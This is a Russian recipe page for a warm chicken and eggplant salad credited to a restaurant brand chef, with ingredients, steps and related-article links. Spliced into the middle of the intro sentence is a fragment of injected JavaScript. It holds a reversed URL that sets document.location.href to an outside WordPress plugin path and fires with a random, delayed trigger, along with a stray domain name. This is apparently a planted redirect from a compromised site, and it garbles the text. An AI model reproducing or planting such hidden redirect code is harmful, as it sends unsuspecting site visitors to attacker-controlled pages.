Рецепт дня: тёплый салат с курицей и баклажанами

Думаете, сытный салат можно приготовить только с майонезом? Концептуальный бренд-шеф ресторанов «Тануки» Олег Чакрян доказывает, что это не так, и делится с читателями fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru рецептом очень вкусного тёплого салата из курицы и баклажанов.

181 calories

Тёплый салат с курицей и баклажанами

Cалат с азиатскими нотками для тех, кто устал от оливье и селёдки под шубой и хочет научиться готовить как шеф-повар.

Изображение рецепта Тёплый салат с курицей и баклажанами

Тёплый салат с курицей и баклажанами

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

25 минут

КОЛИЧЕСТВО ПОРЦИЙ:

1 порция

КАЛОРИЙНОСТЬ:

181 ккал

Сложность

Время

25 минут

Кол-во порций

1 порция

Калорийность

181 ккал

Ингредиенты

Курица (филе, жареное)

50 г

Баклажаны

1 шт.

Крахмал

20 г

Авокадо

25 г

Томаты (черри)

30 г

Киноа (предварительно отварите)

30 г

Шпинат (свежий)

3 г

Кунжут

1 г

Кинза

1 г

Масло

10 мл

Для орехово-кунжутного соуса

Соус (кунжуртный)

75 мл

Соус (понзу)

15 мл

Мёд

13 г

Для заправки

Уксус (рисовый)

27 мл

Соус (соевый)

50 мл

Сахар (пудра)

13 г

Масло (кунжутное)

13 мл

Процесс приготовления

  1. Авокадо очистите и нарежьте на дольки, затем обжарьте со всех сторон на растительном масле.
  2. Помидоры черри разрежьте пополам. 
Жареное куриное филе нарежьте на кубики размером 2 х 2 см.
 Баклажаны очистите от кожуры и нарежьте на кубики размером 2,5 х 2,5 см.

  3. Курицу и баклажаны обваляйте в крахмале. Поместите баклажаны во фритюр, затем добавьте курицу и обжарьте ингредиенты до готовности.
  4. Приготовьте соус и заправку — в отдельных мисках соедините ингредиенты и тщательно перемешайте.
  5. В миске соедините помидоры черри, курицу, баклажаны и киноа, добавьте орехово-кунжутный соус и хорошо перемешайте. Выложите салат горкой в центр тарелки, сверху — листья шпината. Полейте заправкой.
  6. Украсьте салат листьями кинзы, дольками авокадо и кунжутом. 



Статьи по теме

Как приготовить роллы дома: рассказывает бренд-шеф японских ресторанов

Всё о японской кухне: чем полезна, что попробовать и как питаются японцы на самом деле

Моджи: что это за десерт и почему вам нужно его попробовать

Как выбрать вкусных кальмаров и что из них приготовить: рецепты от шеф-повара

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector